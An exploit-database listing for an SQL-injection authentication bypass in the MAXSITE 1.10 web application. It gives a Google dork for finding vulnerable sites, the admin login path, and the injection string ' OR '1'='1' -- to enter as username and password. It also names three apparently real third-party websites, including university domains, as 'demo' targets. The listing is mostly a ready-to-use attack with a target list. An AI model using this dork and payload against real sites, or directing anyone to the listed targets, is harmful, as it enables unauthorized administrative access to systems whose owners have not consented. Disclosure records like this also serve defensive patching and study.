MAXSITE 1.10 Authorization Bypass Vulnerability

2016.02.14
Credit: Iran Cyber Security Group
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: intext:"Powered by MAXSITE 1.10"

########################################### # Exploit Title: MAXSITE 1.10 Authorization Bypass Vulnerability # Date: 2015-2-15 # Exploit Author: Iran Cyber Security Group # Discovered By: L3gi0N # Category : Web Application Bugs # Dork : intext:"Powered by MAXSITE 1.10" # Home: iran-cyber.net ########################################### # Find a target using the dork and then goto: # http://target.com/index.php?name=admin # Type in: # ' OR '1'='1' -- # For both username and password and then login. (Don't forget to add space after --) ########################################### # Demo: # http://www.asianlife.byethost4.com/index.php?name=admin # http://pyc.payap.ac.th/chi2009/index.php?name=admin # http://www.lannapoly.ac.th/web2550/quality/web/index.php?name=admin ########################################### # iran-cyber.net # Thanks to all members of Iran Cyber Security Group ###########################################

References:

http://iran-cyber.net


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top